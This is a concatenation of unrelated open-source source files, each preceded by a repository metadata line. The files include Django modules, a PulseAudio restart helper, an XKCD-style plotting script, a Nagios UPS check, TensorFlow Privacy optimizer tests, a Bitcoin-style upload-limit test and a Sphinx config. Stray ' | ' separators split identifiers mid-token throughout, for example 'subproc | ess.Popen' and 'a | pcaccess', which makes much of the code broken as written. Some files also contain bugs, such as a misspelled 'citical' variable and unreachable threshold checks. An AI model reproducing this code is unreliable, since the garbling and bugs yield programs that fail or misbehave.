self.orig_use_rec(name,**kw)
TaskGen.task_gen.orig_use_rec=TaskGen.task_gen.use_rec
TaskGen.task_gen.use_rec=use_rec
def getattri(self,name,default=None):
if name=='append'or name=='add':
raise Errors.WafError('env.append and env.add do not exist: use env.append_value/env.append_unique')
elif name=='prepend':
raise Errors.WafError('env.prepend does not exist: use env.prepend_value')
if name in self.__slots__:
return object.__getattr__(self,name,default)
else:
return self[name]
ConfigSet.ConfigSet.__getattr__=getattri
def options(opt):
enhance_lib()
def configure(conf):
pass
|
ideascube/ideascube | ideascube/cards.py | Python | agpl-3.0 | 1,516 | 0.00066 | from django.conf import settings
from ideascube.configuration import get_config
# For unittesting purpose, we need to mock the Catalog class.
# However, the mock is made in a fixture and at this moment, we don't
# know where the mocked catalog will be | used.
# So the fixture mocks 'ideascube.serveradmin.catalog.Catalog'.
# If we want to use the moc | ked Catalog here, we must not import the
# Catalog class directly but reference it from ideascube.serveradmin.catalog
# module.
from ideascube.serveradmin import catalog as catalog_mod
def build_builtin_card_info():
card_ids = settings.BUILTIN_APP_CARDS
return [{'id': i} for i in card_ids]
def build_extra_app_card_info():
card_ids = settings.EXTRA_APP_CARDS
return [{'id': i} for i in card_ids]
def build_package_card_info():
package_card_info = []
catalog = catalog_mod.Catalog()
packages_to_display = catalog.list_installed(get_config('home-page', 'displayed-package-ids'))
for package in packages_to_display:
card_info = {
'id': package.template_id,
'name': package.name,
'description': getattr(package, 'description', ''),
'lang': getattr(package, 'language', ''),
'package_id': package.id,
'is_staff': getattr(package, 'staff_only', False),
'theme': getattr(package, 'theme', None),
'css_class': getattr(package, 'css_class', None)
}
package_card_info.append(card_info)
return package_card_info
|
GoeGaming/lutris | lutris/util/audio.py | Python | gpl-3.0 | 262 | 0 | import subprocess
from lutris.util.log import logger
def reset_pulse():
""" Reset pulseaudio. """
pulse_reset = "pulseaudio --kill | && sleep 1 && pulseaudio --start"
subproc | ess.Popen(pulse_reset, shell=True)
logger.debug("PulseAudio restarted")
|
OpenBookProjects/ipynb | XKCD-style/xkcdplot.py | Python | mit | 8,352 | 0.001796 | """
XKCD plot generator
-------------------
Author: Jake Vanderplas
This is a script that will take any matplotlib line diagram, and convert it
to an XKCD-style plot. It will work | for plots with line & text elements,
including axes labels and titles (but not axes tick labels).
The idea for this comes from work by Damon McDougall
http://www.mail-archive.com/matplotlib-users@lists.sourceforge.net/msg25499.html
from:
http://nbviewer.ipython.org/url/jakevdp.github.com/downloads/notebooks/XKCD_p | lots.ipynb
"""
import numpy as np
import pylab as pl
from scipy import interpolate, signal
import matplotlib.font_manager as fm
# We need a special font for the code below. It can be downloaded this way:
import os
import urllib2
#import urllib.request as urllib2
if not os.path.exists('Humor-Sans.ttf'):
fhandle = urllib2.urlopen('http://antiyawn.com/uploads/Humor-Sans-1.0.ttf')
open('Humor-Sans.ttf', 'wb').write(fhandle.read())
def xkcd_line(x, y, xlim=None, ylim=None,
mag=1.0, f1=30, f2=0.05, f3=15):
"""
Mimic a hand-drawn line from (x, y) data
Parameters
----------
x, y : array_like
arrays to be modified
xlim, ylim : data range
the assumed plot range for the modification. If not specified,
they will be guessed from the data
mag : float
magnitude of distortions
f1, f2, f3 : int, float, int
filtering parameters. f1 gives the size of the window, f2 gives
the high-frequency cutoff, f3 gives the size of the filter
Returns
-------
x, y : ndarrays
The modified lines
"""
x = np.asarray(x)
y = np.asarray(y)
# get limits for rescaling
if xlim is None:
xlim = (x.min(), x.max())
if ylim is None:
ylim = (y.min(), y.max())
if xlim[1] == xlim[0]:
xlim = ylim
if ylim[1] == ylim[0]:
ylim = xlim
# scale the data
x_scaled = (x - xlim[0]) * 1. / (xlim[1] - xlim[0])
y_scaled = (y - ylim[0]) * 1. / (ylim[1] - ylim[0])
# compute the total distance along the path
dx = x_scaled[1:] - x_scaled[:-1]
dy = y_scaled[1:] - y_scaled[:-1]
dist_tot = np.sum(np.sqrt(dx * dx + dy * dy))
# number of interpolated points is proportional to the distance
Nu = int(200 * dist_tot)
u = np.arange(-1, Nu + 1) * 1. / (Nu - 1)
# interpolate curve at sampled points
k = min(3, len(x) - 1)
res = interpolate.splprep([x_scaled, y_scaled], s=0, k=k)
x_int, y_int = interpolate.splev(u, res[0])
# we'll perturb perpendicular to the drawn line
dx = x_int[2:] - x_int[:-2]
dy = y_int[2:] - y_int[:-2]
dist = np.sqrt(dx * dx + dy * dy)
# create a filtered perturbation
coeffs = mag * np.random.normal(0, 0.01, len(x_int) - 2)
b = signal.firwin(f1, f2 * dist_tot, window=('kaiser', f3))
response = signal.lfilter(b, 1, coeffs)
x_int[1:-1] += response * dy / dist
y_int[1:-1] += response * dx / dist
# un-scale data
x_int = x_int[1:-1] * (xlim[1] - xlim[0]) + xlim[0]
y_int = y_int[1:-1] * (ylim[1] - ylim[0]) + ylim[0]
return x_int, y_int
def XKCDify(ax, mag=1.0,
f1=50, f2=0.01, f3=15,
bgcolor='w',
xaxis_loc=None,
yaxis_loc=None,
xaxis_arrow='+',
yaxis_arrow='+',
ax_extend=0.1,
expand_axes=False):
"""Make axis look hand-drawn
This adjusts all lines, text, legends, and axes in the figure to look
like xkcd plots. Other plot elements are not modified.
Parameters
----------
ax : Axes instance
the axes to be modified.
mag : float
the magnitude of the distortion
f1, f2, f3 : int, float, int
filtering parameters. f1 gives the size of the window, f2 gives
the high-frequency cutoff, f3 gives the size of the filter
xaxis_loc, yaxis_log : float
The locations to draw the x and y axes. If not specified, they
will be drawn from the bottom left of the plot
xaxis_arrow, yaxis_arrow : str
where to draw arrows on the x/y axes. Options are '+', '-', '+-', or ''
ax_extend : float
How far (fractionally) to extend the drawn axes beyond the original
axes limits
expand_axes : bool
if True, then expand axes to fill the figure (useful if there is only
a single axes in the figure)
"""
# Get axes aspect
ext = ax.get_window_extent().extents
aspect = (ext[3] - ext[1]) / (ext[2] - ext[0])
xlim = ax.get_xlim()
ylim = ax.get_ylim()
xspan = xlim[1] - xlim[0]
yspan = ylim[1] - xlim[0]
xax_lim = (xlim[0] - ax_extend * xspan,
xlim[1] + ax_extend * xspan)
yax_lim = (ylim[0] - ax_extend * yspan,
ylim[1] + ax_extend * yspan)
if xaxis_loc is None:
xaxis_loc = ylim[0]
if yaxis_loc is None:
yaxis_loc = xlim[0]
# Draw axes
xaxis = pl.Line2D([xax_lim[0], xax_lim[1]], [xaxis_loc, xaxis_loc],
linestyle='-', color='k')
yaxis = pl.Line2D([yaxis_loc, yaxis_loc], [yax_lim[0], yax_lim[1]],
linestyle='-', color='k')
# Label axes3, 0.5, 'hello', fontsize=14)
ax.text(xax_lim[1], xaxis_loc - 0.02 * yspan, ax.get_xlabel(),
fontsize=14, ha='right', va='top', rotation=12)
ax.text(yaxis_loc - 0.02 * xspan, yax_lim[1], ax.get_ylabel(),
fontsize=14, ha='right', va='top', rotation=78)
ax.set_xlabel('')
ax.set_ylabel('')
# Add title
ax.text(0.5 * (xax_lim[1] + xax_lim[0]), yax_lim[1],
ax.get_title(),
ha='center', va='bottom', fontsize=16)
ax.set_title('')
Nlines = len(ax.lines)
lines = [xaxis, yaxis] + [ax.lines.pop(0) for i in range(Nlines)]
for line in lines:
x, y = line.get_data()
x_int, y_int = xkcd_line(x, y, xlim, ylim,
mag, f1, f2, f3)
# create foreground and background line
lw = line.get_linewidth()
line.set_linewidth(2 * lw)
line.set_data(x_int, y_int)
# don't add background line for axes
if (line is not xaxis) and (line is not yaxis):
line_bg = pl.Line2D(x_int, y_int, color=bgcolor,
linewidth=8 * lw)
ax.add_line(line_bg)
ax.add_line(line)
# Draw arrow-heads at the end of axes lines
arr1 = 0.03 * np.array([-1, 0, -1])
arr2 = 0.02 * np.array([-1, 0, 1])
arr1[::2] += np.random.normal(0, 0.005, 2)
arr2[::2] += np.random.normal(0, 0.005, 2)
x, y = xaxis.get_data()
if '+' in str(xaxis_arrow):
ax.plot(x[-1] + arr1 * xspan * aspect,
y[-1] + arr2 * yspan,
color='k', lw=2)
if '-' in str(xaxis_arrow):
ax.plot(x[0] - arr1 * xspan * aspect,
y[0] - arr2 * yspan,
color='k', lw=2)
x, y = yaxis.get_data()
if '+' in str(yaxis_arrow):
ax.plot(x[-1] + arr2 * xspan * aspect,
y[-1] + arr1 * yspan,
color='k', lw=2)
if '-' in str(yaxis_arrow):
ax.plot(x[0] - arr2 * xspan * aspect,
y[0] - arr1 * yspan,
color='k', lw=2)
# Change all the fonts to humor-sans.
prop = fm.FontProperties(fname='Humor-Sans.ttf', size=16)
for text in ax.texts:
text.set_fontproperties(prop)
# modify legend
leg = ax.get_legend()
if leg is not None:
leg.set_frame_on(False)
for child in leg.get_children():
if isinstance(child, pl.Line2D):
x, y = child.get_data()
child.set_data(xkcd_line(x, y, mag=10, f1=100, f2=0.001))
child.set_linewidth(2 * child.get_linewidth())
if isinstance(child, pl.Text):
child.set_fontproperties(prop)
# Set the axis limits
ax.set_xlim(xax_lim[0] - 0.1 * xspan,
xax_lim[1] + 0.1 * xspan)
ax.set_ylim(yax_lim[0] - 0.1 * yspan,
yax_lim[1] + 0.1 * yspan)
# adjust the axes
ax.set_xticks([])
|
sumaxime/LIFAP1 | TD/TD3/Code/Python/3.py | Python | mit | 243 | 0 | #!/usr/bin/python
# Afficher les dix nom | bres su | ivants la valeur N donnée en paramètre
def show_num(a):
for i in range(10):
print(a, end='')
a += 1
print('Donne moi une valeur : ', end='')
a = int(input())
show_num(a)
|
okin006/tracker | tracker/urls.py | Python | mit | 811 | 0 | """tracker URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.8/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Add an import: from blog import urls as blog_urls
2. Add a URL to urlpatterns: url(r'^blog/', include(blog_urls))
"""
from django.conf.urls import include, url
from django.contri | b import admin
urlpatterns = [
url(r'^admin/', include(admin.site.urls)),
| url(r'^ticket/', include('tracker.ticket.urls')),
]
|
eXk0n/nagios-plugins | apcupsd-nagios.py | Python | mit | 1,574 | 0.021601 | #!/usr/bin/env python
import subprocess
import sys
warning = False
critical = False
load = subprocess.check_output("/usr/sbin/apcaccess -p LOADPCT -u", shell=True).rstrip()
bcharge = subprocess.check_output("/usr/sbin/apcaccess -p BCHARGE -u", shell=True).rstrip()
timeleft = subprocess.check_output("/usr/sbin/apcaccess -p TIMELEFT -u", shell=True).rstrip()
linev = subprocess.check_output("/usr/sbin/a | pcaccess -p LINEV -u", shell=True).rstrip()
battv = subprocess.check_output("/usr/sbin/apcaccess -p BATTV -u", shell=True).rstrip( | )
if float(load) > 70.0:
warning = True
elif float(load) > 90.0:
citical = True
if float(linev) > 240.0:
warning = True
elif float(linev) > 250.0:
critical = True
if float(linev) < 210.0:
warning = True
elif float(linev) < 200.0:
critical = True
if float(battv) > 28.0:
warning = True
elif float(battv) > 29.0:
critical = True
if float(battv) < 11.0:
warning = True
elif float(battv) < 10.0:
critical = True
if float(timeleft) < 10.0:
warning = True
elif float(timeleft) < 5.0:
critical = True
if float(bcharge) < 50.0:
warning = True
elif float(bcharge) < 20.0:
critical = True
if warning == True:
print "WARNING - check ups values! |",
elif critical == True:
print "CRITICAL - check ups values! |",
else:
print "Ok - ups looks good |",
print "battery-load=" + str(load) + ";" , "battery-charge=" + str(bcharge) + ";" , "timeleft=" + str(timeleft) + ";" , "linevolt=" + str(linev) + ";" , "batteryvolt=" + str(battv) + ";"
if warning == True:
sys.exit(1)
elif critical == True:
sys.exit(2)
else:
sys.exit(0)
|
tensorflow/privacy | tensorflow_privacy/privacy/optimizers/dp_optimizer_keras_test.py | Python | apache-2.0 | 19,265 | 0.003426 | # Copyright 2019, The TensorFlow Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
from tensorflow_privacy.privacy.optimizers import dp_optimizer_keras
from tensorflow_privacy.privacy.optimizers import dp_optimizer_keras_vectorized
class DPOptimizerComputeGradientsTest(tf.test.TestCase, parameterized.TestCase):
"""Tests for _compute_gradients method."""
def _loss(self, val0, val1):
"""Loss function whose derivative w.r.t val1 is val1 - val0."""
return 0.5 * tf.reduce_sum(
input_tensor=tf.math.squared_difference(val0, val1), axis=1)
# Parameters for testing: optimizer, num_microbatches, expected gradient for
# var0, expected gradient for var1.
@parameterized.named_parameters(
('DPGradientDescent 1', dp_optimizer_keras.DPKerasSGDOptimizer, 1,
[-2.5, -2.5], [-0.5]),
('DPAdam 2', dp_optimizer_keras.DPKerasAdamOptimizer, 2, [-2.5, -2.5
], [-0.5]),
('DPAdagrad 4', dp_optimizer_keras.DPKerasAdagradOptimizer, 4,
[-2.5, -2.5], [-0.5]),
('DPGradientDescentVectorized 1',
dp_optimizer_keras_vectorized.VectorizedDPKerasSGDOptimizer, 1,
[-2.5, -2.5], [-0.5]),
('DPAdamVectorized 2',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdamOptimizer, 2,
[-2.5, -2.5], [-0.5]),
('DPAdagradVectorized 4',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdagradOptimizer, 4,
[-2.5, -2.5], [-0.5]),
('DPAdagradVectorized None',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdagradOptimizer, None,
[-2.5, -2.5], [-0.5]),
)
def testBaselineWithCallableLoss(self, cls, num_microbatches, expected_grad0,
expected_grad1):
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([3.0])
data0 = tf.Variable([[3.0, 4.0], [5.0, 6.0], [7.0, 8.0], [-1.0, 0.0]])
data1 = tf.Variable([[8.0], [2.0], [3.0], [1.0]])
opt = cls(
l2_norm_clip=100.0,
noise_multiplier=0.0,
num_microbatches=num_microbatches,
learning_rate=2.0)
loss = lambda: self._loss(data0, var0) + self._loss(data1, var1)
grads_and_vars = opt._compute_gradients(loss, [var0, var1])
self.assertAllCloseAccordingToType(expected_grad0, grads_and_vars[0][0])
self.assertAllCloseAccordingToType(expected_grad1, grads_and_vars[1][0])
# Parameters for testing: optimizer, num_microbatches, expected gradient for
# var0, expected gradient for var1.
@parameterized.named_parameters(
('DPGradientDescent 1', dp_optimizer_keras.DPKerasSGDOptimizer, 1,
[-2.5, -2.5], [-0.5]),
('DPAdam 2', dp_optimizer_keras.DPKerasAdamOptimizer, 2, [-2.5, -2.5
], [-0.5]),
('DPAdagrad 4', dp_optimizer_keras.DPKerasAdagradOptimizer, 4,
[-2.5, -2.5], [-0.5]),
('DPGradientDescentVectorized 1',
dp_optimizer_keras_vectorized.VectorizedDPKerasSGDOptimizer, 1,
[-2.5, -2.5], [-0.5]),
('DPAdamVectorized 2',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdamOptimizer, 2,
[-2.5, -2.5], [-0.5]),
('DPAdagradVectorized 4',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdagradOptimizer, 4,
[-2.5, -2.5], [-0.5]),
('DPAdagradVectorized None',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdagradOptimizer, None,
[-2.5, -2.5], [-0.5]),
)
def testBaselineWithTensorLoss(self, cls, num_microbatches, expected_grad0,
expected_grad1):
var0 = tf.Variable([1.0, 2.0])
var1 = tf.Variable([3.0])
data0 = tf.Variable([[3.0, 4.0], [5.0, 6.0], [7.0, 8.0], [-1.0, 0.0]])
data1 = tf.Variable([[8.0], [2.0], [3.0], [1.0]])
opt = cls(
l2_norm_clip=100.0,
noise_multiplier=0.0,
num_microbatches=num_microbatches,
learning_rate=2.0)
tape = tf.GradientTape()
with tape:
loss = self._loss(data0, var0) + self._loss(data1, var1)
grads_and_vars = opt._compute_gradients(loss, [var0, var1], tape=tape)
self.assertAllCloseAccordingToType(expected_grad0, grads_and_vars[0][0])
self.assertAllCloseAccordingToType(expected_grad1, grads_and_vars[1][0])
@parameterized.named_parameters(
('DPGradientDescent', dp_optimizer_keras.DPKerasSGDOptimizer),
('DPGradientDescentVectorized',
dp_optimizer_keras_vectorized.VectorizedDPKerasSGDOptimizer),
)
def testClippingNorm(self, cls):
var0 = tf.Variable([0.0, 0.0])
data0 = tf.Variable([[3.0, 4.0], [6.0, 8.0]])
opt = cls(
l2_norm_clip=1.0,
noise_multiplier=0.0,
num_microbatches=1,
learning_rate=2.0)
loss = lambda: self._loss(data0, var0)
# Expected gradient is sum of differences.
grads_and_vars = opt._compute_gradients(loss, [var0])
self.assertAllCloseAccordingToType([-0.6, -0.8], grads_and_vars[0][0])
@parameterized.named_parameters(
('DPGradientDescent 2 4 1', dp_optimizer_keras.DPKerasSGDOptimizer, 2.0,
4.0, 1),
('DPGradientDescent 4 1 4', dp_optimizer_keras.DPKerasSGDOptimizer, 4.0,
1.0, 4),
('DPGradientDescentVectorized 2 4 1',
dp_optimizer_keras_vectorized.VectorizedDPKerasSGDOptimizer, 2.0, 4.0,
1),
('DPGradientDescentVectorized 4 1 4',
dp_optimizer_keras_vectorized.VectorizedDPKerasSGDOptimizer, 4.0, 1.0,
4),
)
def testNoiseMultiplier(self, cls, l2_norm_clip, noise_multiplier,
num_microbatches):
var0 = tf.Variable(tf.zeros([1000], dtype=tf.float32))
data0 = tf.Variable(tf.zeros([16, 1000], dtype=tf.float32))
opt = cls(
l2_norm_clip=l2_norm_clip,
noise_multiplier=noise_multiplier,
num_microbatches=num_microbatches,
learning_rate=2.0)
loss = lambda: self._loss(data0, var0)
grads_and_vars = opt._compute_gradients(loss, [var0])
grads = grads_and_vars[0][0].numpy()
# Test standard deviation is close to l2_norm_clip * noise_multiplier.
self.assertNear(
np.std(grads), l2_norm_clip * noise_multiplier / num_microbatches, 0.5)
@parameterized.named_parameters(
('DPGradientDescent', dp_optimizer_keras.DPKerasSGDOptimizer),
('DPAdagrad', dp_optimizer_keras.DPKerasAdagradOptimizer),
('DPAdam', dp_optimizer_keras.DPKerasAdamOptimizer),
('DPGradientDescentVectorized',
dp_optimizer_keras_vectori | zed.VectorizedDPKerasSGDOptimizer),
( | 'DPAdagradVectorized',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdagradOptimizer),
('DPAdamVectorized',
dp_optimizer_keras_vectorized.VectorizedDPKerasAdamOptimizer),
)
def testAssertOnNoCallOfComputeGradients(self, cls):
"""Tests that assertion fails when DP gradients are not computed."""
opt = cls(
l2_norm_clip=100.0,
noise_multiplier=0.0,
num_microbatches=1,
learning_rate=2.0)
with self.assertRaises(AssertionError):
grads_and_vars = tf.Variable([0.0])
opt.apply_gradients(grads_and_vars)
# Expect no exception if _compute_gradients is called.
var0 = tf.Variable([0.0])
data0 = tf.Variable([[0.0]])
loss = lambda: self._loss(data0, var0)
grads_and_vars = opt._compute_gradients(loss, [var0])
opt.apply_gradients(grads_and_vars)
class DPOptimizerGetGradientsTest(tf.test.TestCase, parameterized.TestCase):
"""Tests for get_gradient method.
Since get_gradients must run in graph mode, the method is tested within
the Estimator framework.
"""
def _make_linear_model_fn( |
jriehl/numba | examples/kernel-density-estimation/kernel_density_estimation.py | Python | bsd-2-clause | 1,135 | 0.003524 | #
# Copyright (c) 2017 Intel Corporation
# SPDX-License-Identifier: BSD-2-Clause
#
from numba import njit, prange
import numpy as np
import argparse
import time
def kde(X):
b = 0.5
points = np.array([-1.0, 2.0, 5.0])
N = points.shape[0]
n = X.shape[0]
exps = 0
# "prange" in a normal function is identical to "range"
for i in prange( | n):
p = X[i]
d = (-(p-points)**2)/(2*b**2)
m = np.min(d)
exps += m-np.log(b*N)+np.log(np.sum(np.exp(d-m)))
return exps
def main():
parser = argparse.ArgumentParser(description='Kernel-Density')
parser.add_argument('--size', dest='size', type=int, default=10000000)
parser.add_argument('--iterations', dest='iterations', type=int, default=20)
args = parser.parse_args()
size = args.siz | e
iterations = args.iterations
np.random.seed(0)
kde(np.random.ranf(10))
print("size:", size)
X = np.random.ranf(size)
t1 = time.time()
for _ in range(iterations):
res = kde(X)
t = time.time()-t1
print("checksum:", res)
print("SELFTIMED:", t)
if __name__ == '__main__':
main()
|
AdnCoin/AdnCoin | qa/rpc-tests/maxuploadtarget.py | Python | mit | 10,732 | 0.003075 | #!/usr/bin/env python2
#
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
'''
Test behavior of -maxuploadtarget.
* Verify that getdata requests for old blocks (>1week) are dropped
if uploadtarget has been reached.
* Verify that getdata requests for recent blocks are respecteved even
if uploadtarget has been reached.
* Verify that the upload counters are reset after 24 hours.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to sending
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
def __init__(self):
NodeConnCB.__init__(self)
self.connection = None
self.ping_counter = 1
self.last_pong = msg_pong()
self.block_receive_map = {}
def add_connection(self, conn):
self.connection = conn
self.peer_disconnected = False
def on_inv(self, conn, message):
pass
# Track the last getdata message we receive (used in the test)
def on_getdata(self, conn, message):
self.last_getdata = message
def on_block(self, conn, message):
message.block.calc_sha256()
try:
self.block_receive_map[message.block.sha256] += 1
except KeyError as e:
self.block_receive_map[message.block.sha256] = 1
# Spin until verack message is received from the node.
# We use this to signal that our test can begin. This
# is called from the testing thread, so it needs to acquire
# the global lock.
def wait_for_verack(self):
def veracked():
return self.verack_received
return wait_until(veracked, timeout=10)
def wait_for_disconnect(self):
def disconnected():
return self.peer_disconnected
return wait_until(disconnected, timeout=10)
# Wrapper for the NodeConn's send_message function
def send_message(self, message):
self.connection.send_message(message)
def on_pong(self, conn, message):
self.last_pong = message
def on_close(self, conn):
self.peer_disconnected = True
# Sync up with the node after delivery of a block
def sync_with_ping(self, timeout=30):
def received_pong():
return (self.last_pong.nonce == self.ping_counter)
self.connection.send_message(msg_ping(nonce=self.ping_counter))
success = wait_until(received_pong, timeout)
self.ping_counter += 1
return success
class MaxUploadTest(BitcoinTestFramework):
def __init__(self):
self.utxo = []
self.txouts = gen_return_txouts()
def add_options(self, parser):
parser.add_option("--testbinary", dest="testbinary",
default=os.getenv("ADND", "adnd"),
help="adnd binary to test")
def setup_chain(self):
initialize_chain_clean(self.options.tmpdir, 2)
def setup_network(self):
# Start a node with maxuploadtarget of 200 MB (/24h)
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug", "-maxuploadtarget=200", "-blockmaxsize=999000"]))
def mine_full_block(self, node, address):
# Want to create a full block
# We'll generate a 66k transaction below, and 14 of them is close to the 1MB block limit
for j in xrange(14):
if len(self.utxo) < 14:
self.utxo = node.listunspent()
inputs=[]
outputs = {}
t = self.utxo.pop()
inputs.append({ "txid" : t["txid"], "vout" : t["vout"]})
remchange = t["amount"] - Decimal("0.001000")
outputs[address]=remchange
# Create a basic transaction that will send change back to ourself after account for a fee
# And then insert the 128 generated transaction outs in the middle rawtx[92] is where the #
# of txouts is stored and is the only thing we overwrite from the original transaction
rawtx = node.createrawtransaction(inputs, outputs)
newtx = rawtx[0:92]
newtx = newtx + self.txouts
newtx = newtx + rawtx[94:]
# Appears to be ever so slightly faster to sign with SIGHASH_NONE
signresult = node.signrawtransaction(newtx,None,None,"NONE")
txid = node.sendrawtransaction(signresult["hex"], True)
# Mine a full sized block which will be these transactions we just created
node.generate(1)
def run_test(self):
# Before we connect anything, we first set the time on the node
# to be in the past, otherwise things break because the CNode
# time counters can't be reset backward after initialization
old_time = int(time.time() - 2*60*60*24*7)
self.nodes[0].setmocktime(old_time)
# Generate some old blocks
self.nodes[0].generate(130)
# test_nodes[0] will only request old blocks
# test_nodes[1] will only r | equest new blocks
# test_nodes[2] will test resetting the counte | rs
test_nodes = []
connections = []
for i in xrange(3):
test_nodes.append(TestNode())
connections.append(NodeConn('127.0.0.1', p2p_port(0), self.nodes[0], test_nodes[i]))
test_nodes[i].add_connection(connections[i])
NetworkThread().start() # Start up network handling in another thread
[x.wait_for_verack() for x in test_nodes]
# Test logic begins here
# Now mine a big block
self.mine_full_block(self.nodes[0], self.nodes[0].getnewaddress())
# Store the hash; we'll request this later
big_old_block = self.nodes[0].getbestblockhash()
old_block_size = self.nodes[0].getblock(big_old_block, True)['size']
big_old_block = int(big_old_block, 16)
# Advance to two days ago
self.nodes[0].setmocktime(int(time.time()) - 2*60*60*24)
# Mine one more block, so that the prior block looks old
self.mine_full_block(self.nodes[0], self.nodes[0].getnewaddress())
# We'll be requesting this new block too
big_new_block = self.nodes[0].getbestblockhash()
new_block_size = self.nodes[0].getblock(big_new_block)['size']
big_new_block = int(big_new_block, 16)
# test_nodes[0] will test what happens if we just keep requesting the
# the same big old block too many times (expect: disconnect)
getdata_request = msg_getdata()
getdata_request.inv.append(CInv(2, big_old_block))
max_bytes_per_day = 200*1024*1024
daily_buffer = 144 * MAX_BLOCK_SIZE
max_bytes_available = max_bytes_per_day - daily_buffer
success_count = max_bytes_available // old_block_size
# 144MB will be reserved for relaying new blocks, so expect this to
# succeed for ~70 tries.
for i in xrange(success_count):
test_nodes[0].send_message(getdata_request)
test_nodes[0].sync_with_ping()
assert_equal(test_nodes[0].block_receive_map[big_old_block], i+1)
assert_equal(len(self.nodes[0].getpeerinfo()), 3)
# At most a couple more tries should succeed (depending on how long
# the test has been running so far).
for i in xrange(3):
test_nodes[0].send_message(getdata_request)
test_nodes[0].wait_for_disconnect()
assert_equal(len(self.nodes[0].getpeerinfo()), 2)
print "Peer 0 disconnected after downloading old block too many times"
# Requesting the current block on test_nodes[1] should succeed indefinitely,
# even when over the max upload target.
# We'll try 200 times
getdata_request.inv = [CInv(2, big_new_block)]
for i in xrange(200):
test_nodes[1].send_message(getdata_request)
test_nodes[1].sync_with_ping()
assert_equal(test_nodes[1].block_receive_map[big_new_block], i+1 |
JasonHanG/tensor-gallery | basic-operation/linear_regression.py | Python | apache-2.0 | 1,901 | 0.002104 | import numpy as np
import matplotlib.pyplot as plt
import tensorflow as tf
import xlrd
DATA_FILE = 'data/fire_theft.xls'
# Step 1: read in data from the .xls file
book = xlrd.open_workbook(DATA_FILE, encoding_override="utf-8")
sheet = book.sheet_by_index(0)
data = np.asarray([sheet.row_values(i) for | i in range(1, sheet.nrows)])
n_samples = sheet.nrows - 1
# Step 2: create placeholders for input X (number of fire) and l | abel Y (number of theft)
X = tf.placeholder(tf.float32, name='X')
Y = tf.placeholder(tf.float32, name='Y')
# Step 3: create weight and bias, initialized to 0
w = tf.Variable(0.0, name='weights')
b = tf.Variable(0.0, name='bias')
# Step 4: build model to predict Y
Y_predicted = X * w + b
# Step 5: use the square error as the loss function
loss = tf.square(Y - Y_predicted, name='loss')
# loss = utils.huber_loss(Y, Y_predicted)
# Step 6: using gradient descent with learning rate of 0.01 to minimize loss
optimizer = tf.train.GradientDescentOptimizer(learning_rate=0.001).minimize(loss)
with tf.Session() as sess:
# Step 7: initialize the necessary variables, in this case, w and b
sess.run(tf.global_variables_initializer())
writer = tf.summary.FileWriter('./graphs/linear_reg', sess.graph)
# Step 8: train the model
for i in range(50): # train the model 100 epochs
total_loss = 0
for x, y in data:
# Session runs train_op and fetch values of loss
_, l = sess.run([optimizer, loss], feed_dict={X: x, Y: y})
total_loss += l
print('Epoch {0}: {1}'.format(i, total_loss / n_samples))
# close the writer when you're done using it
writer.close()
# Step 9: output the values of w and b
w, b = sess.run([w, b])
# plot the results
X, Y = data.T[0], data.T[1]
plt.plot(X, Y, 'bo', label='Real data')
plt.plot(X, X * w + b, 'r', label='Predicted data')
plt.legend()
plt.show() |
jdl-mit-alum/code-quality | python_2_7/Search/docs/conf.py | Python | gpl-3.0 | 8,441 | 0.005331 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# parlogser documentation build configuration file, created by
# sphinx-quickstart on Tue Jul 9 22:26:36 2013.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
# If extensions (or modules to document with autodoc) are in another
# directory, add these directories to sys.path here. If the directory is
# relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.insert(0, os.path.abspath('.'))
# Get the project root dir, which is the parent dir of this
cwd = os.getcwd()
project_root = os.path.dirname(cwd)
# Insert the project root dir as the first element in the PYTHONPATH.
# This lets us ensure that the source package is imported, and that its
# version is used.
sys.path.insert(0, project_root)
import parlogser
# -- General configuration ---------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.viewcode']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The encoding of source files.
#source_encoding = 'utf-8-sig'
# The master toctree document.
master_doc = 'index'
# General information about the project.
project = u'parlogser'
copyright = u'2016, Jonathan D. Lettvin'
# The version info for the project you're documenting, acts as replacement
# for |version| and |release|, also used in various other places throughout
# the built documents.
#
# The short X.Y version.
version = parlogser.__version__
# The full version, including alpha/beta/rc tags.
release = parlogser.__version__
# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#language = None
# There are two options for replacing |today|: either, you set today to
# some non-false value, then it is used:
#today = ''
